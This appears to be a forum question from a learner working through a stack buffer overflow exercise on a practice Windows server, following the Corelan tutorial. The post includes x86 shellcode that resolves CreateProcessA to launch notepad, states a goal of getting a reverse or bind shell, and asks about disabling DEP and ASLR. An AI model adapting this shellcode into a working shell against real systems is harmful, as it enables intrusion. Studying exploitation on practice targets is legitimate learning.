I have been struggling for 1 week and cannot figure this out. Please help. My friend gave me an executable which is just a simple server and has a buffer overflow vulnerability. My goal is to get a reverse/bind shell. I followed the instructions from: https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ and was able to find "jmp esp" and successfully run the shellcode from: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html The problem is that I am not able to run any shellcode from Metasploit/the internet. I tried to modify the shellcode and was able to pop notepad, but cannot run commands like:
- msconfig
- echo test>test.txt
- cmd /c calc
Below is my shellcode:
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd"
#"\x68\x63\x61\x6c\x63" #calc
#
"\x68\x70\x61\x64\x20\x68\x6E\x6F\x74\x65"#notepad
#"\x68\x6E\x66\x69\x67\x68\x6D\x73\x63\x6F"#msconfig
"\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7"
Please give me some hints about why I cannot run any other shellcode or command.
Environment: Win 7 Professional, McAfee installed, Immunity Debugger
I suspect that he used some protection mechanism when compiling the executable. But since I can pop calc and notepad, why can I not run other commands? Anyway, I am new to buffer overflows and shellcode, please help.

Update: I asked some people, and they said I should try to turn off some protections. I tried disabling DEP, but it still does not work. Should I disable ASLR and UAC?